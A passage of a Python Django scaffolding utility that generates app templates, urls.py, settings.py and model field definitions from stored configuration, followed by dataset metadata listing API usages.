\"/templates/\" + app_name + \"/new_page_template.html\",\n \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating navbar.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of new_page_template.html failed: ' + str(e))\n\n try:\n t = Template(\n filename='applicationManager/templates/applicationManager/applicationFileTemplates/app_index_html_template.txt')\n # t = loader.get_template('projectCore/applicationFileTemplates/app_index_html_template.txt')\n buf = StringIO()\n c = mako.runtime.Context(buf, applicationName=app_name)\n t.render_context(c)\n\n open(self.site_root + \"/\" + app_name + \"/templates/\" + app_name + \"/dashboard.html\", \"w+\").write(\n buf.getvalue())\n except Exception as e:\n logger.fatal(\"Exception occurred while creating dashboard.html file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=app_name))\n raise Exception('creation of dashboard.html failed: ' + str(e))\n return True\n\n def updateProjectUrlsPy(self):\n \"\"\"\n This method created the Urls.py file for the entire project using a template file.\n Method reads application table and create the necessary file.\n \"\"\"\n\n try:\n logger.info(\n \"\\n--------------------------------------------------------\\n\\t\\tRefreshing application list in urls.py\")\n copyfile(self.site_root + \"/\" + settings.APPLICATION_NAME + \"/urls.py\",\n self.site_root + \"/\" + settings.APPLICATION_NAME + \"/urls.py.backup\")\n t = loader.get_template('applicationManager/applicationFileTemplates/project_urls_py.txt')\n\n apps = Application.objects.all()\n\n c = {'applist': apps}\n rendered = t.render(c)\n\n open(self.site_root + \"/\" + settings.APPLICATION_NAME + \"/urls.py\", \"w+\").write(rendered)\n except Exception as e:\n raise Exception('updateProjectUrlsPy failed: '+str(e))\n # def updateProjectUrlsPy(self):\n # \"\"\"\n # This method created the Urls.py file for the entire project using a template file.\n #\n # \"\"\"\n # logger.info(\"\\n--------------------------------------------------------------\\n\\t\\t\"\n # \"Refreshing application list in urls.py\")\n # t = loader.get_template('applicationManager/applicationFileTemplates/project_urls_py.txt')\n #\n # app_nameList = getAppNameListByAppsPy()\n # print(\"Applications which will be created in database : \" + str(app_nameList))\n #\n # try:\n # allapps = Application.objects.all()\n # allapps.delete()\n # print(\"deleted applications table content\")\n # except Exception as e:\n # print(\"Deletion of database entries for applications failed\")\n #\n # appConfigs = []\n # for app_name in app_nameList:\n # pass\n # # Application config ile bu islemin yapilmasi durumu imkansiz: Cunku appconfig kullanmak icin\n # # app settings dosyasinda olmali ama bu durumda uygulama yeniden basladigi icin tum uygulama akisi\n # # resetlenmektedir.\n # # # confName = app_name+'AppConfig'\n # # print(app_name)\n # # appConf = apps.get_app_config(app_name)\n # # appConfigs.append(appConf)\n # # print(appConf)\n # # # print(appConf.yvar)\n #\n # c = Context({'applist': appConfigs})\n # rendered = t.render(c)\n #\n # # buf = StringIO()\n # # c = mako.runtime.Context(buf, applist=appConfigs)\n # # t.render_context(c)\n #\n # open(self.site_root + \"/\" + settings.APPLICATION_NAME + \"/urls.py\", \"w+\").write(rendered)\n\n # Updates only the settings file\n def updateProjectSettingsPy(self):\n try:\n copyfile(self.site_root + \"/\" + settings.APPLICATION_NAME + \"/settings.py\",\n self.site_root + \"/\" + settings.APPLICATION_NAME + \"/settings.py.\" + str(\n datetime.datetime.now().isoformat()))\n appList = Application.objects.all()\n print(\"List of applications to be added to the settings file :\" + str(appList))\n\n t = loader.get_template('applicationManager/applicationFileTemplates/project_settings_py.txt')\n c = {'appList': appList}\n rendered = t.render(c)\n open(self.site_root + \"/\" + settings.APPLICATION_NAME + \"/settings.py\", \"w+\").write(rendered)\n except Exception as e:\n\n logger.fatal(\"Exception occurred while updating project settings file : %s\", e)\n application_creation_failed_signal.send(sender=Application.__class__, test=\"testString\",\n application=Application.objects.get(app_name=self.application.app_name))\n raise Exception('creation of project settings.py failed: ' + str(e))\n\n def rollback(self):\n logger.error(\"Rolling back the installation\")\n raise NotImplementedError\n pass\n\n def get_import(self, model):\n for dir in os.listdir(self.site_root):\n if os.path.isdir('{0}{1}'.format(self.site_root, dir)) \\\n and os.path.exists('{0}{1}/models.py'.format(self.site_root, dir)):\n with open('{0}{1}/models.py'.format(self.site_root, dir), 'r') as fp:\n # Check if model exists\n for line in fp.readlines():\n if 'class {0}(models.Model)'.format(model) in line:\n # print \"Foreign key '%s' was found in app %s...\" % (model, dir)\n return IMPORT_MODEL_TEMPLATE % {'app': dir, 'model': model}\n return None\n\n def is_imported(self, path, model):\n with open(path, 'r') as import_file:\n for line in import_file.readlines():\n if 'import {0}'.format(model) in line:\n print(\"Foreign key '%s' was found in models.py...\" % (model))\n return True\n return False\n\n def is_declared(self, path, model):\n with open(path, 'r') as import_file:\n for line in import_file.readlines():\n if 'class {0}'.format(model.capitalize()) in line:\n logger.info(\"Foreign key '%s' was found in models.py...\" % (model))\n return True\n return False\n\n def get_type_parameters(self, field):\n # parameter list is assumed comma seperated equity phrases\n params = field.type_parameter\n\n if params == \"\":\n return None\n else:\n # try:\n # if isinstance(params,six.string_types):\n #\n # else:\n # print(params.__class__)\n # except ValueError as e:\n # logger.fatal(\"Json document is not well formatted : \"+params)\n\n pass\n\n def get_field(self, field):\n self.get_type_parameters(field)\n\n # Default vals\n field_name = field.name\n null_val = True\n blank_val = True\n lenght_val = \"255\"\n default_val = \"255\"\n digits_val = \"3\"\n places_val = \"3\"\n\n print(field)\n print(field.__class__)\n\n tp = field.type_parameter\n try:\n tp = tp.split(\",\")\n except:\n logger.warning(\"No comma seperated input\")\n\n for param in tp:\n try:\n param_key, param_val = param.split(\":\")\n except:\n logger.error(\"parameter format is not correct\")\n break\n\n if param_key.lower() == \"null\":\n null_val = param_val\n\n if param_key.lower() == \"blank\":\n blank_val = param_val\n\n if param_key.lower() == \"length\":\n lenght_val = param_val\n\n if param_key.lower() == \"default\":\n default_val = param_val\n\n if param_key.lower() == \"digits\":\n digits_val = param_val\n\n if param_key.lower() == \"places\":\n places_val = param_val\n\n if param_key.lower() == \"foreign\":\n foreign_val = param_val\n\n if field.type.lower() == 'char' or field.type.lower() == 'charfield' :\n return CHARFIELD_TEMPLATE % {'name': field_name, 'length': lenght_val, 'null': null_val, 'blank': blank_val}\n\n elif field.type.lower() == 'text' or field.type.lower() == 'textfield':\n return TEXTFIELD_TEMPLATE % {'name': field_name, 'null': null_val}\n\n elif field.type.lower() == 'int' or field.type.lower() == 'integerfield':\n return INTEGERFIELD_TEMPLATE % {'name': field_name, 'null': null_val, 'default': default_val}\n\n elif field.type.lower() == 'decimal' or field.type.lower() == 'decimalfield':\n return DECIMALFIELD_TEMPLATE % {\n 'name': field_name,\n 'digits': digits_val,\n 'places': places_val,\n 'null': null_val,\n 'default': default_val,\n }\n elif field.type.lower() == 'datetime' or field.type.lower() == 'datetimesssfield':\n\n return DATETIMEFIELD_TEMPLATE % {'name': field_name, 'null': null_val, 'default': default_val}\n\n elif field.type.lower() == 'foreign':\n foreign = foreign_val\n name = field_name\n # Check if this foreign key is already in models.py\n if foreign in ('User', 'Group'):\n if not self.is_imported('{0}{1}/models.py'.format(self.site_root,\n self.application.app_name), foreign):\n self.imports.append('\\nfrom django.contrib.auth.models import User, Group\\n')\n return FOREIGNFIELD_TEMPLATE % {'name': name, 'foreign': foreign, 'null': 'True'}\n\n if self.is_imported('{0}{1}/models.py'.format(\n self.site_root, self.application.app_name), foreign) or self.is_declared('{0}{1}/models.py'.format(\n self.site_root, self.application.app_name), foreign):\n return FOREIGNFIELD_TEMPLATE % {'name': name, 'foreign': foreign, 'null': 'True'}\n\n # Check imports\n if self.get_import(foreign):\n self.imports.append(self.get_import(foreign))\n return FOREIGNFIELD_TEMPLATE % {'name': name, 'foreign': foreign, 'null': 'True'}\n\n logger.info('error\\t{0}{1}/models.py\\t{2} class not found'.format(\n self.site_root, self.application.app_name, foreign), 1)\n return None\n\n def model_exists(self, model_id, file):\n\n mfile = open(file.format(self.site_root, self.application.app_name, self.sub_models), 'r')\n lines = mfile.readlines()\n mfile.close()\n\n model_name = (AppModel.objects.get(id=model_id)).name\n\n for line in lines:\n if 'class ' + model_name + '(models.Model):'.format(self.application.app_name, self.sub_models) in line:\n return True\n return False\n\n", "sub_path": "util/soft_application_creator.py", "file_name": "soft_application_creator.py", "file_ext": "py", "file_size_in_byte": 45782, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.settings.SITE_ROOT", "line_number": 80, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 80, "usage_type": "name"}, {"api_name": "django.conf.settings.SUB_MODEL_DIR", "line_number": 81, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 81, "usage_type": "name"}, {"api_name": "django.conf.settings.SCAFFOLD_APPS_DIR", "line_number": 84, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 84, "usage_type": "name"}, {"api_name": "applicationManager.models.SettingDefinition.objects.all", "line_number": 89, "usage_type": "call"}, {"api_name": "applicationManager.models.SettingDefinition.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "applicationManager.models.SettingDefinition", "line_number": 89, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationSettings.objects.create", "line_number": 92, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationSettings.objects", "line_number": 92, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationSettings", "line_number": 92, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationUrl", "line_number": 96, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects.get", "line_number": 96, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 96, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationUrl", "line_number": 100, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects.get", "line_number": 100, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 100, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationUrl", "line_number": 105, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects.get", "line_number": 105, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 105, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 105, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate.objects.get", "line_number": 113, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate.objects", "line_number": 113, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate", "line_number": 113, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 117, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 118, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects.create", "line_number": 119, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 119, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 119, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate.objects.get", "line_number": 124, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate.objects", "line_number": 124, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate", "line_number": 124, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 128, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 129, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects.create", "line_number": 130, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 130, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 130, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate.objects.get", "line_number": 134, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate.objects", "line_number": 134, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationComponentTemplate", "line_number": 134, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 138, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 139, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects.create", "line_number": 140, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 140, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 140, "usage_type": "name"}, {"api_name": "applicationManager.models.ApplicationView.objects.filter", "line_number": 146, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationView.objects", "line_number": 146, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationView", "line_number": 146, "usage_type": "name"}, {"api_name": "types.ModuleType", "line_number": 147, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 148, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationUrl.objects.filter", "line_number": 157, "usage_type": "call"}, {"api_name": "applicationManager.models.ApplicationUrl.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "applicationManager.models.ApplicationUrl", "line_number": 157, "usage_type": "name"}, {"api_name": "types.ModuleType", "line_number": 160, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 161, "usage_type": "attribute"}, {"api_name": "django.urls.path", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path", "line_number": 217, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "io.StringIO", "line_number": 241, "usage_type": "call"}, {"api_name": "django.core.management.call_command", "line_number": 249, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 313, "usage_type": "call"}, {"api_name": "os.path", "line_number": 313, "usage_type": "attribute"}, {"api_name": "django.template.loader.get_template", "line_number": 316, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 316, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 324, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 324, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 324, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 324, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 325, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 325, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 325, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 335, "usage_type": "call"}, {"api_name": "os.path", "line_number": 335, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 347, "usage_type": "call"}, {"api_name": "os.path", "line_number": 347, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 348, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path", "line_number": 351, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 354, "usage_type": "call"}, {"api_name": "os.path", "line_number": 354, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 355, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 356, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 358, "usage_type": "call"}, {"api_name": "os.path", "line_number": 358, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 361, "usage_type": "call"}, {"api_name": "os.path", "line_number": 361, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 362, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 364, "usage_type": "call"}, {"api_name": "os.path", "line_number": 364, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 365, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 366, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 368, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 370, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 374, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 375, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 382, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 382, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 382, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 382, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 383, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 383, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 383, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 394, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 394, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 403, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 403, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 403, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 403, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 404, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 404, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 404, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 412, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 412, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 422, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 422, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 422, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 422, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 423, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 423, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 423, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 427, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 427, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 436, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 436, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 436, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 436, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 437, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 437, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 437, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 446, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 446, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 455, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 455, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 455, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 455, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 456, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 456, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 456, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 478, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 478, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 486, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 486, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 496, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 496, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 496, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 496, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 497, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 497, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 497, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 511, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 511, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 518, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 518, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 518, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 518, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 519, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 519, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 519, "usage_type": "name"}, {"api_name": "applicationManager.models.AppModel.objects.get", "line_number": 539, "usage_type": "call"}, {"api_name": "applicationManager.models.AppModel.objects", "line_number": 539, "usage_type": "attribute"}, {"api_name": "applicationManager.models.AppModel", "line_number": 539, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 558, "usage_type": "call"}, {"api_name": "os.path", "line_number": 558, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 559, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 580, "usage_type": "call"}, {"api_name": "os.path", "line_number": 580, "usage_type": "attribute"}, {"api_name": "applicationManager.models.AppModel.objects.get", "line_number": 615, "usage_type": "call"}, {"api_name": "applicationManager.models.AppModel.objects", "line_number": 615, "usage_type": "attribute"}, {"api_name": "applicationManager.models.AppModel", "line_number": 615, "usage_type": "name"}, {"api_name": "applicationManager.models.AppModel.objects.get", "line_number": 661, "usage_type": "call"}, {"api_name": "applicationManager.models.AppModel.objects", "line_number": 661, "usage_type": "attribute"}, {"api_name": "applicationManager.models.AppModel", "line_number": 661, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 701, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 704, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 705, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 705, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 712, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 712, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 712, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 712, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 713, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 713, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 713, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 717, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 720, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 721, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 721, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 728, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 728, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 728, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 728, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 729, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 729, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 729, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 732, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 734, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 735, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 735, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 743, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 743, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 743, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 743, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 744, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 744, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 744, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 747, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 749, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 750, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 750, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 758, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 758, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 758, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 758, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 759, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 759, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 759, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 763, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 765, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 766, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 766, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 774, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 774, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 774, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 774, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 775, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 775, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 775, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 779, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 781, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 782, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 782, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 791, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 791, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 791, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 791, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 792, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 792, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 792, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 796, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 798, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 799, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 799, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 807, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 807, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 807, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 807, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 808, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 808, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 808, "usage_type": "name"}, {"api_name": "django.template.Template", "line_number": 812, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 815, "usage_type": "call"}, {"api_name": "mako.runtime.Context", "line_number": 816, "usage_type": "call"}, {"api_name": "mako.runtime", "line_number": 816, "usage_type": "attribute"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 823, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 823, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 823, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 823, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 824, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 824, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 824, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 837, "usage_type": "call"}, {"api_name": 